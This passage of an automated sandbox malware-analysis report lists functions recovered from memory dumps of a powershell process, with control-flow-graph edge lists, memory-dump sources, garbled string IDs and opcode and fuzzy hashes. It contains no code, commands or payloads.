                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$1}h
                                                                                                                                              • API String ID: 0-3343704238
                                                                                                                                              • Opcode ID: a5bc8c1555e982ddc90d8f851ac7b33d62ad2d86baae94e77c5fb44219747d78
                                                                                                                                              • Instruction ID: fe90b7acb8a99516366558041e1c03f8af3ea3b9d4b4aff2a7b9b0410e611473
                                                                                                                                              • Opcode Fuzzy Hash: a5bc8c1555e982ddc90d8f851ac7b33d62ad2d86baae94e77c5fb44219747d78
                                                                                                                                              • Instruction Fuzzy Hash: 7D723AF1B0424DCFE7148B6D98146AABBA5EF85A10F1488EBD645CF352DA32C84DC7A1
                                                                                                                                              Function 07BFA970 Relevance: 16.7, Strings: 13, Instructions: 418COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 980 7bfa970-7bfa995 981 7bfa99b-7bfa9a0 980->981 982 7bfaba4-7bfabee 980->982 983 7bfa9b8-7bfa9c4 981->983 984 7bfa9a2-7bfa9a8 981->984 989 7bfabf4-7bfabf9 982->989 990 7bfada0-7bfadaa 982->990 992 7bfab4e-7bfab58 983->992 993 7bfa9ca-7bfa9cd 983->993 986 7bfa9ac-7bfa9b6 984->986 987 7bfa9aa 984->987 986->983 987->983 994 7bfabfb-7bfac01 989->994 995 7bfac11-7bfac15 989->995 1004 7bfadac-7bfadc5 990->1004 998 7bfab5a-7bfab63 992->998 999 7bfab66-7bfab6c 992->999 993->992 997 7bfa9d3-7bfa9da 993->997 1000 7bfac05-7bfac0f 994->1000 1001 7bfac03 994->1001 1002 7bfad4f-7bfad59 995->1002 1003 7bfac1b-7bfac1d 995->1003 997->982 1007 7bfa9e0-7bfa9e5 997->1007 1008 7bfab6e-7bfab70 999->1008 1009 7bfab72-7bfab7e 999->1009 1000->995 1001->995 1005 7bfad5b-7bfad64 1002->1005 1006 7bfad67-7bfad6d 1002->1006 1010 7bfac1f-7bfac2b 1003->1010 1011 7bfac2d 1003->1011 1004->1004 1013 7bfadc7-7bfadd7 1004->1013 1014 7bfad6f-7bfad71 1006->1014 1015 7bfad73-7bfad7f 1006->1015 1016 7bfa9fd-7bfaa01 1007->1016 1017 7bfa9e7-7bfa9ed 1007->1017 1018 7bfab80-7bfaba1 1008->1018 1009->1018 1012 7bfac2f-7bfac31 1010->1012 1011->1012 1012->1002 1020 7bfac37-7bfac39 1012->1020 1021 7bfae4d-7bfae9c 1013->1021 1022 7bfadd9-7bfadde 1013->1022 1023 7bfad81-7bfad9d 1014->1023 1015->1023 1016->992 1026 7bfaa07-7bfaa0b 1016->1026 1024 7bfa9ef 1017->1024 1025 7bfa9f1-7bfa9fb 1017->1025 1029 7bfac3b-7bfac47 1020->1029 1030 7bfac49 1020->1030 1069 7bfae9e-7bfaea0 1021->1069 1070 7bfaeaa-7bfaebf 1021->1070 1031 7bfadf6-7bfae02 1022->1031 1032 7bfade0-7bfade6 1022->1032 1024->1016 1025->1016 1034 7bfaa1e 1026->1034 1035 7bfaa0d-7bfaa1c 1026->1035 1038 7bfac4b-7bfac4d 1029->1038 1030->1038 1031->1021 1041 7bfae04-7bfae0b 1031->1041 1039 7bfadea-7bfadf4 1032->1039 1040 7bfade8 1032->1040 1036 7bfaa20-7bfaa22 1034->1036 1035->1036 1036->992 1044 7bfaa28-7bfaa2a 1036->1044 1038->1002 1047 7bfac53-7bfac5e 1038->1047 1039->1031 1040->1031 1048 7bfae0d-7bfae13 1041->1048 1049 7bfae23-7bfae34 1041->1049 1050 7bfaa2c-7bfaa38 1044->1050 1051 7bfaa3a 1044->1051 1053 7bfac7c 1047->1053 1054 7bfac60-7bfac66 1047->1054 1056 7bfae17-7bfae21 1048->1056 1057 7bfae15 1048->1057 1063 7bfae39-7bfae4c 1049->1063 1059 7bfaa3c-7bfaa3e 1050->1059 1051->1059 1062 7bfac7e-7bfac8a 1053->1062 1060 7bfac6c-7bfac78 1054->1060 1061 7bfac68-7bfac6a 1054->1061 1056->1049 1057->1049 1059->992 1065 7bfaa44-7bfaa4c 1059->1065 1066 7bfac7a 1060->1066 1061->1066 1062->1002 1075 7bfac90-7bfaca8 1062->1075 1071 7bfaa4e-7bfaa54 1065->1071 1072 7bfaa6a 1065->1072 1066->1062 1069->1070 1076 7bfaa5a-7bfaa66 1071->1076 1077 7bfaa56-7bfaa58 1071->1077 1078 7bfaa6c-7bfaa77 1072->1078 1085 7bfacaa-7bfacb0 1075->1085 1086 7bfacc2-7bfacdd 1075->1086 1079 7bfaa68 1076->1079 1077->1079 1078->992 1084 7bfaa7d-7bfaa97 1078->1084 1079->1078 1091 7bfaaba 1084->1091 1092 7bfaa99-7bfaaa2 1084->1092 1087 7bfacb4-7bfacc0 1085->1087 1088 7bfacb2 1085->1088 1099 7bfacdf-7bface5 1086->1099 1100 7bfacf5-7bfad4c 1086->1100 1087->1086 1088->1086 1096 7bfaabd-7bfaadc 1091->1096 1094 7bfaaa9-7bfaab6 1092->1094 1095 7bfaaa4-7bfaaa7 1092->1095 1098 7bfaab8 1094->1098 1095->1098 1108 7bfaade-7bfaae4 1096->1108 1109 7bfaaf4-7bfab4b 1096->1109 1098->1096 1104 7bface9-7bfaceb 1099->1104 1105 7bface7 1099->1105 1104->1100 1105->1100 1110 7bfaae8-7bfaaea 1108->1110 1111 7bfaae6 1108->1111 1110->1109 1111->1109
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                              • API String ID: 0-2118039658
                                                                                                                                              • Opcode ID: 0522d3f61939dbb27061f8d19c26e9981390c19b798b60a385163491ce23c180
                                                                                                                                              • Instruction ID: cc6795e282aa6785cf493b3ca93b8e923de88f9776ebf5c9c6b13fcc3e689b46
                                                                                                                                              • Opcode Fuzzy Hash: 0522d3f61939dbb27061f8d19c26e9981390c19b798b60a385163491ce23c180
                                                                                                                                              • Instruction Fuzzy Hash: 14D1F9F5B042068FEB1C8F69C940666BBE6EF86A10F14C4AEDA098F355DB31D84DC791
                                                                                                                                              Function 07BF32B0 Relevance: 13.1, Strings: 10, Instructions: 580COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1113 7bf32b0-7bf32c0 1114 7bf32c2-7bf32ce 1113->1114 1115 7bf32d0 1113->1115 1116 7bf32d2-7bf32d4 1114->1116 1115->1116 1117 7bf32da-7bf32f9 1116->1117 1118 7bf33a3-7bf33ad 1116->1118 1127 7bf32fb-7bf3307 1117->1127 1128 7bf3309 1117->1128 1119 7bf33af-7bf33b6 1118->1119 1120 7bf33b9-7bf33bf 1118->1120 1121 7bf33c5-7bf33d1 1120->1121 1122 7bf33c1-7bf33c3 1120->1122 1124 7bf33d3-7bf33ef 1121->1124 1122->1124 1130 7bf330b-7bf330d 1127->1130 1128->1130 1130->1118 1131 7bf3313-7bf333d 1130->1131 1135 7bf333f-7bf3345 1131->1135 1136 7bf3355-7bf3361 1131->1136 1137 7bf3349-7bf3353 1135->1137 1138 7bf3347 1135->1138 1136->1118 1141 7bf3363-7bf336a 1136->1141 1137->1136 1138->1136 1142 7bf33f2-7bf3441 1141->1142 1143 7bf3370-7bf3375 1141->1143 1152 7bf3447-7bf344c 1142->1152 1153 7bf35d0-7bf361e 1142->1153 1144 7bf338d-7bf3396 1143->1144 1145 7bf3377-7bf337d 1143->1145 1150 7bf339b-7bf33a0 1144->1150 1147 7bf337f 1145->1147 1148 7bf3381-7bf338b 1145->1148 1147->1144 1148->1144 1154 7bf344e-7bf3454 1152->1154 1155 7bf3464-7bf3468 1152->1155 1161 7bf3787-7bf37b7 1153->1161 1162 7bf3624-7bf3629 1153->1162 1156 7bf3458-7bf3462 1154->1156 1157 7bf3456 1154->1157 1159 7bf346e-7bf3470 1155->1159 1160 7bf3580-7bf358a 1155->1160 1156->1155 1157->1155 1163 7bf3472-7bf347e 1159->1163 1164 7bf3480 1159->1164 1165 7bf358c-7bf3595 1160->1165 1166 7bf3598-7bf359e 1160->1166 1183 7bf37b9-7bf37be 1161->1183 1184 7bf37e1-7bf3813 1161->1184 1168 7bf362b-7bf3631 1162->1168 1169 7bf3641-7bf3645 1162->1169 1170 7bf3482-7bf3484 1163->1170 1164->1170 1171 7bf35a4-7bf35b0 1166->1171 1172 7bf35a0-7bf35a2 1166->1172 1176 7bf3635-7bf363f 1168->1176 1177 7bf3633 1168->1177 1173 7bf364b-7bf364d 1169->1173 1174 7bf3736-7bf3740 1169->1174 1170->1160 1178 7bf348a-7bf34a9 1170->1178 1179 7bf35b2-7bf35cd 1171->1179 1172->1179 1181 7bf364f-7bf365b 1173->1181 1182 7bf365d 1173->1182 1185 7bf374e-7bf3754 1174->1185 1186 7bf3742-7bf374b 1174->1186 1176->1169 1177->1169 1209 7bf34ab-7bf34c6 1178->1209 1210 7bf34c8 1178->1210 1188 7bf365f-7bf3661 1181->1188 1182->1188 1190 7bf37d6-7bf37d8 1183->1190 1191 7bf37c0-7bf37c6 1183->1191 1201 7bf3815-7bf381a 1184->1201 1202 7bf3871-7bf3884 1184->1202 1192 7bf375a-7bf3766 1185->1192 1193 7bf3756-7bf3758 1185->1193 1188->1174 1196 7bf3667-7bf3669 1188->1196 1206 7bf37df-7bf37e0 1190->1206 1197 7bf37ca-7bf37d4 1191->1197 1198 7bf37c8 1191->1198 1199 7bf3768-7bf3784 1192->1199 1193->1199 1203 7bf366b-7bf3677 1196->1203 1204 7bf3679 1196->1204 1197->1190 1198->1190 1211 7bf381c-7bf3822 1201->1211 1212 7bf3832-7bf3838 1201->1212 1224 7bf38be-7bf38d8 1202->1224 1225 7bf3886-7bf38a5 1202->1225 1213 7bf367b-7bf367d 1203->1213 1204->1213 1221 7bf34ca-7bf34cc 1209->1221 1210->1221 1215 7bf3826-7bf3830 1211->1215 1216 7bf3824 1211->1216 1218 7bf383a-7bf3846 1212->1218 1219 7bf3848-7bf384b 1212->1219 1213->1174 1220 7bf3683-7bf3685 1213->1220 1215->1212 1216->1212 1218->1219 1241 7bf3856-7bf386a 1218->1241 1237 7bf3852-7bf3855 1219->1237 1226 7bf369f-7bf3733 1220->1226 1227 7bf3687-7bf368d 1220->1227 1221->1160 1228 7bf34d2-7bf34dc 1221->1228 1243 7bf38da-7bf38ec 1224->1243 1244 7bf3940-7bf3945 1224->1244 1230 7bf38a7-7bf38b3 1225->1230 1231 7bf38b5 1225->1231 1233 7bf368f 1227->1233 1234 7bf3691-7bf369d 1227->1234 1235 7bf34de-7bf34f9 1228->1235 1236 7bf353a-7bf356d 1228->1236 1240 7bf38b7-7bf38b9 1230->1240 1231->1240 1233->1226 1234->1226 1254 7bf34fb-7bf3501 1235->1254 1255 7bf3513-7bf351e 1235->1255 1275 7bf3574-7bf357d 1236->1275 1245 7bf38bb 1240->1245 1246 7bf38f2-7bf38fc 1240->1246 1241->1202 1243->1246 1244->1243 1245->1224 1252 7bf38fe-7bf3902 1246->1252 1253 7bf3905-7bf390b 1246->1253 1260 7bf390d-7bf390f 1253->1260 1261 7bf3911-7bf391d 1253->1261 1257 7bf3505-7bf3511 1254->1257 1258 7bf3503 1254->1258 1268 7bf3536-7bf3538 1255->1268 1269 7bf3520-7bf3526 1255->1269 1257->1255 1258->1255 1264 7bf391f-7bf393d 1260->1264 1261->1264 1268->1275 1272 7bf352a-7bf352c 1269->1272 1273 7bf3528 1269->1273 1272->1268 1273->1268
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                              • API String ID: 0-2280548817
                                                                                                                                              • Opcode ID: 9e13bf5d9b1cc835bd699e3cb3e182df037ae4780d2f6f61d3f813a50964e40c
                                                                                                                                              • Instruction ID: 9cb67af071222e65e96d25b9c3c4d298bd3c0b8e4aacc904dd70273a93840082
                                                                                                                                              • Opcode Fuzzy Hash: 9e13bf5d9b1cc835bd699e3cb3e182df037ae4780d2f6f61d3f813a50964e40c
                                                                                                                                              • Instruction Fuzzy Hash: F30249F1B042459FE7159B78980476ABBE6EFC2B10F1484AED605CB392DE36C84DC7A1
                                                                                                                                              Function 07750048 Relevance: 10.9, Strings: 8, Instructions: 902COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2720857155.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7750000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$x.~h$-~h
                                                                                                                                              • API String ID: 0-1489227000
                                                                                                                                              • Opcode ID: e3fc1f6dca0735e29f8cfb2dfdfad5af23241f9c2b1f1337eb977dfa9967fca5
                                                                                                                                              • Instruction ID: 7cd2e393316eeba4cba23bacd63871ce82479b509b96889082d8a5c66f5cef4a
                                                                                                                                              • Opcode Fuzzy Hash: e3fc1f6dca0735e29f8cfb2dfdfad5af23241f9c2b1f1337eb977dfa9967fca5
                                                                                                                                              • Instruction Fuzzy Hash: 8B72C074B00219CFDB14CF68C944BAEBBB2BB85340F5489A9D809AB351DB71ED85CB91
                                                                                                                                              Function 07BF08F8 Relevance: 9.2, Strings: 7, Instructions: 485COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1530 7bf08f8-7bf091d 1531 7bf0923-7bf0928 1530->1531 1532 7bf0b30-7bf0b68 1530->1532 1533 7bf092a-7bf0930 1531->1533 1534 7bf0940-7bf0944 1531->1534 1544 7bf0b6a-7bf0b76 1532->1544 1545 7bf0b78 1532->1545 1535 7bf0934-7bf093e 1533->1535 1536 7bf0932 1533->1536 1537 7bf094a-7bf094c 1534->1537 1538 7bf0ae0-7bf0aea 1534->1538 1535->1534 1536->1534 1542 7bf094e-7bf095a 1537->1542 1543 7bf095c 1537->1543 1540 7bf0aec-7bf0af5 1538->1540 1541 7bf0af8-7bf0afe 1538->1541 1547 7bf0b04-7bf0b10 1541->1547 1548 7bf0b00-7bf0b02 1541->1548 1550 7bf095e-7bf0960 1542->1550 1543->1550 1546 7bf0b7a-7bf0b7c 1544->1546 1545->1546 1551 7bf0b7e-7bf0b89 1546->1551 1552 7bf0bf7-7bf0c01 1546->1552 1553 7bf0b12-7bf0b2d 1547->1553 1548->1553 1550->1538 1554 7bf0966-7bf0985 1550->1554 1555 7bf0b8b-7bf0b91 1551->1555 1556 7bf0ba7 1551->1556 1557 7bf0c0d-7bf0c13 1552->1557 1558 7bf0c03-7bf0c0a 1552->1558 1574 7bf0987-7bf0993 1554->1574 1575 7bf0995 1554->1575 1561 7bf0b97-7bf0ba3 1555->1561 1562 7bf0b93-7bf0b95 1555->1562 1565 7bf0ba9-7bf0bb5 1556->1565 1563 7bf0c19-7bf0c25 1557->1563 1564 7bf0c15-7bf0c17 1557->1564 1567 7bf0ba5 1561->1567 1562->1567 1568 7bf0c27-7bf0c43 1563->1568 1564->1568 1565->1552 1576 7bf0bb7-7bf0bbe 1565->1576 1567->1565 1578 7bf0997-7bf0999 1574->1578 1575->1578 1579 7bf0c46-7bf0c61 1576->1579 1580 7bf0bc4-7bf0bc9 1576->1580 1578->1538 1582 7bf099f-7bf09a6 1578->1582 1589 7bf0c18 1579->1589 1590 7bf0c63-7bf0c8a 1579->1590 1583 7bf0bcb-7bf0bd1 1580->1583 1584 7bf0be1-7bf0bea 1580->1584 1582->1532 1586 7bf09ac-7bf09b1 1582->1586 1587 7bf0bd5-7bf0bdf 1583->1587 1588 7bf0bd3 1583->1588 1676 7bf0bed call 7bf08f8 1584->1676 1677 7bf0bed call 7bf08d7 1584->1677 1678 7bf0bed call 7bf0b50 1584->1678 1591 7bf09c9-7bf09d7 1586->1591 1592 7bf09b3-7bf09b9 1586->1592 1587->1584 1588->1584 1589->1563 1595 7bf0ddc-7bf0df5 1590->1595 1596 7bf0c90-7bf0c95 1590->1596 1591->1538 1602 7bf09dd-7bf09fa 1591->1602 1597 7bf09bd-7bf09c7 1592->1597 1598 7bf09bb 1592->1598 1593 7bf0bef-7bf0bf4 1609 7bf0df7-7bf0e1d 1595->1609 1610 7bf0e53-7bf0e92 1595->1610 1600 7bf0cad-7bf0cb1 1596->1600 1601 7bf0c97-7bf0c9d 1596->1601 1597->1591 1598->1591 1606 7bf0d8e-7bf0d98 1600->1606 1607 7bf0cb7-7bf0cb9 1600->1607 1604 7bf0c9f 1601->1604 1605 7bf0ca1-7bf0cab 1601->1605 1602->1538 1634 7bf0a00-7bf0a25 1602->1634 1604->1600 1605->1600 1611 7bf0d9a-7bf0da2 1606->1611 1612 7bf0da5-7bf0dab 1606->1612 1613 7bf0cbb-7bf0cc7 1607->1613 1614 7bf0cc9 1607->1614 1617 7bf0e1f-7bf0e2b 1609->1617 1618 7bf0e2d 1609->1618 1619 7bf0dad-7bf0daf 1612->1619 1620 7bf0db1-7bf0dbd 1612->1620 1622 7bf0ccb-7bf0ccd 1613->1622 1614->1622 1624 7bf0e2f-7bf0e31 1617->1624 1618->1624 1625 7bf0dbf-7bf0dce 1619->1625 1620->1625 1622->1606 1623 7bf0cd3-7bf0ceb 1622->1623 1635 7bf0ced-7bf0cf3 1623->1635 1636 7bf0d05-7bf0d0b 1623->1636 1627 7bf0e95-7bf0e9f 1624->1627 1628 7bf0e33-7bf0e51 1624->1628 1640 7bf0dd3-7bf0dd9 1625->1640 1632 7bf0eac-7bf0eb2 1627->1632 1633 7bf0ea1-7bf0ea9 1627->1633 1628->1610 1637 7bf0eb8-7bf0ec4 1632->1637 1638 7bf0eb4-7bf0eb6 1632->1638 1634->1538 1658 7bf0a2b-7bf0a62 1634->1658 1641 7bf0cf7-7bf0d03 1635->1641 1642 7bf0cf5 1635->1642 1645 7bf0d2d-7bf0d32 1636->1645 1646 7bf0d0d-7bf0d25 1636->1646 1643 7bf0ec6-7bf0ee0 1637->1643 1638->1643 1641->1636 1642->1636 1647 7bf0d4a-7bf0d8b 1645->1647 1648 7bf0d34-7bf0d3a 1645->1648 1646->1645 1651 7bf0d3e-7bf0d48 1648->1651 1652 7bf0d3c 1648->1652 1651->1647 1652->1647 1665 7bf0a7c-7bf0a83 1658->1665 1666 7bf0a64-7bf0a6a 1658->1666 1669 7bf0a9b-7bf0add 1665->1669 1670 7bf0a85-7bf0a8b 1665->1670 1667 7bf0a6e-7bf0a7a 1666->1667 1668 7bf0a6c 1666->1668 1667->1665 1668->1665 1671 7bf0a8f-7bf0a99 1670->1671 1672 7bf0a8d 1670->1672 1671->1669 1672->1669 1676->1593 1677->1593 1678->1593
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                              • API String ID: 0-3199432138
                                                                                                                                              • Opcode ID: 5c66b889d6d1757448b61af4fa72da4a4637f2362b937b4655f2dd2f2b0f83e8
                                                                                                                                              • Instruction ID: b1f9f45e3fcfa8c7183fdcd7d4b030b044ca3c99cc18d69fcbb8f24f94165bb7
                                                                                                                                              • Opcode Fuzzy Hash: 5c66b889d6d1757448b61af4fa72da4a4637f2362b937b4655f2dd2f2b0f83e8
                                                                                                                                              • Instruction Fuzzy Hash: DFF11CF57042068FEB14AA6D980076ABBE5EFC5610F14C4BBDA05CB367EA31D84DC7A1
                                                                                                                                              Function 07BF78B1 Relevance: 4.2, Strings: 3, Instructions: 466COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$a$x.~h
                                                                                                                                              • API String ID: 0-642354190
                                                                                                                                              • Opcode ID: b8aca0fc77087e810040193262998245a28959e8ed7c39856164f15956297c37
                                                                                                                                              • Instruction ID: 5c0bfb6447af3bdd9d39c6dc3b54845488d24fb8d8fe793c9d4f9e8af4c68226
                                                                                                                                              • Opcode Fuzzy Hash: b8aca0fc77087e810040193262998245a28959e8ed7c39856164f15956297c37
                                                                                                                                              • Instruction Fuzzy Hash: B7125EB4A01205DFEB14CF58C954E69B7B2FF85B14F95C0A9E909AB355CB32EC4ACB40
                                                                                                                                              Function 07BF5388 Relevance: 3.9, Strings: 3, Instructions: 171COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2121 7bf5388-7bf5398 2122 7bf539a-7bf53a6 2121->2122 2123 7bf53a8 2121->2123 2124 7bf53aa-7bf53ac 2122->2124 2123->2124 2125 7bf53ae-7bf53b9 2124->2125 2126 7bf5427-7bf5431 2124->2126 2127 7bf53bb-7bf53c1 2125->2127 2128 7bf53d7 2125->2128 2129 7bf543d-7bf5443 2126->2129 2130 7bf5433-7bf543a 2126->2130 2134 7bf53c7-7bf53d3 2127->2134 2135 7bf53c3-7bf53c5 2127->2135 2131 7bf53d9-7bf53e5 2128->2131 2132 7bf5449-7bf5455 2129->2132 2133 7bf5445-7bf5447 2129->2133 2131->2126 2141 7bf53e7-7bf53ee 2131->2141 2136 7bf5457-7bf5473 2132->2136 2133->2136 2137 7bf53d5 2134->2137 2135->2137 2137->2131 2143 7bf5476-7bf547c 2141->2143 2144 7bf53f4-7bf53f9 2141->2144 2152 7bf547e-7bf5481 2143->2152 2153 7bf54a3-7bf54b5 2143->2153 2145 7bf53fb-7bf5401 2144->2145 2146 7bf5411-7bf541a 2144->2146 2148 7bf5405-7bf540f 2145->2148 2149 7bf5403 2145->2149 2151 7bf541f-7bf5424 2146->2151 2148->2146 2149->2146 2155 7bf54b7-7bf54c3 2153->2155 2156 7bf54c5 2153->2156 2157 7bf54c7-7bf54c9 2155->2157 2156->2157 2158 7bf54cb-7bf54d1 2157->2158 2159 7bf5515-7bf551f 2157->2159 2162 7bf54df-7bf54fc 2158->2162 2163 7bf54d3-7bf54d5 2158->2163 2160 7bf552a-7bf5530 2159->2160 2161 7bf5521-7bf5527 2159->2161 2164 7bf5536-7bf5542 2160->2164 2165 7bf5532-7bf5534 2160->2165 2168 7bf54fe-7bf550f 2162->2168 2169 7bf5562-7bf5567 2162->2169 2163->2162 2167 7bf5544-7bf555f 2164->2167 2165->2167 2168->2159 2169->2168
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $^q$$^q$$^q
                                                                                                                                              • API String ID: 0-831282457
                                                                                                                                              • Opcode ID: 66a52318fe07509e77239276f39882e4913245e394619b9b983048208912f1a9
                                                                                                                                              • Instruction ID: 98122a1897919dcc8b193e805dde5000169e18e489be5288932ed9b0aa6251bc
                                                                                                                                              • Opcode Fuzzy Hash: 66a52318fe07509e77239276f39882e4913245e394619b9b983048208912f1a9
                                                                                                                                              • Instruction Fuzzy Hash: 905149F170420A9BE7345A6D9804A26F7A6EFC1A11F34C4AEEA05CF355DE72D819C750
                                                                                                                                              Function 07BF7E8D Relevance: 3.0, Strings: 2, Instructions: 475COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$x.~h
                                                                                                                                              • API String ID: 0-2403300862
                                                                                                                                              • Opcode ID: 7658804e706ad117a567827a0f1b483b12060cf82c392bfeb7860342b18f0261
                                                                                                                                              • Instruction ID: 2c09845de14ff6696f3b70ca5227e87e51264106463cac767a4d1ab9b2fca3bd
                                                                                                                                              • Opcode Fuzzy Hash: 7658804e706ad117a567827a0f1b483b12060cf82c392bfeb7860342b18f0261
                                                                                                                                              • Instruction Fuzzy Hash: 3F1271B4B01205DFEB14CF58C950E69B7B2EF85B14F94C0A9E909AB355CB32ED4ACB50
                                                                                                                                              Function 07758B5E Relevance: 2.8, Strings: 2, Instructions: 338COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2617 7758b5e-7758b61 2618 7758b62 2617->2618 2619 7758b63 2618->2619 2620 7758bde-7758c12 2618->2620 2619->2618 2621 7758b64-7758b71 2619->2621 2648 7758c19-7758c25 2620->2648 2622 7758b77-7758b7c 2621->2622 2623 7758dfe-7758e0e 2621->2623 2625 7758b94-7758ba2 2622->2625 2626 7758b7e-7758b84 2622->2626 2632 7758e17-7758e43 2623->2632 2633 7758e10-7758e16 2623->2633 2634 7758d9f-7758da9 2625->2634 2635 7758ba8-7758bd6 2625->2635 2629 7758b86 2626->2629 2630 7758b88-7758b92 2626->2630 2629->2625 2630->2625 2638 7758f94-7758fa4 2632->2638 2639 7758e49-7758e4e 2632->2639 2633->2632 2640 7758db7-7758dbd 2634->2640 2641 7758dab-7758db4 2634->2641 2635->2648 2643 7758e66-7758e6a 2639->2643 2644 7758e50-7758e56 2639->2644 2645 7758dc3-7758dcf 2640->2645 2646 7758dbf-7758dc1 2640->2646 2652 7758f41-7758f4b 2643->2652 2653 7758e70-7758e72 2643->2653 2649 7758e58 2644->2649 2650 7758e5a-7758e64 2644->2650 2651 7758dd1-7758dfb 2645->2651 2646->2651 2654 7758d42-7758d90 2648->2654 2655 7758c2b-7758c30 2648->2655 2649->2643 2650->2643 2656 7758f4d-7758f56 2652->2656 2657 7758f59-7758f5f 2652->2657 2653->2652 2660 7758e78-7758e7c 2653->2660 2707 7758d95-7758d9c 2654->2707 2661 7758c32-7758c38 2655->2661 2662 7758c48-7758c86 2655->2662 2663 7758f65-7758f71 2657->2663 2664 7758f61-7758f63 2657->2664 2667 7758e9c 2660->2667 2668 7758e7e-7758e9a 2660->2668 2670 7758c3c-7758c46 2661->2670 2671 7758c3a 2661->2671 2690 7758c95-7758ca4 2662->2690 2691 7758c88-7758c8b 2662->2691 2673 7758f73-7758f91 2663->2673 2664->2673 2669 7758e9e-7758ea0 2667->2669 2668->2669 2669->2652 2677 7758ea6-7758eaf 2669->2677 2670->2662 2671->2662 2677->2652 2686 7758eb5-7758ec8 2677->2686 2699 7758ecd-7758ecf 2686->2699 2694 7758ca6-7758ca9 2690->2694 2695 7758cb3-7758cc2 2690->2695 2691->2690 2694->2695 2697 7758cc4-7758cc7 2695->2697 2698 7758cd1-7758cf4 2695->2698 2697->2698 2713 7758cf6 call 7526cda 2698->2713 2714 7758cf6 call 7526ce8 2698->2714 2715 7758cf6 call 7527158 2698->2715 2716 7758cf6 call 7526fef 2698->2716 2717 7758cf6 call 75270fc 2698->2717 2700 7758ee7-7758f3e 2699->2700 2701 7758ed1-7758ed7 2699->2701 2705 7758ed9 2701->2705 2706 7758edb-7758edd 2701->2706 2705->2700 2706->2700 2708 7758cfb-7758d40 2708->2707 2713->2708 2714->2708 2715->2708 2716->2708 2717->2708
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2720857155.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7750000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
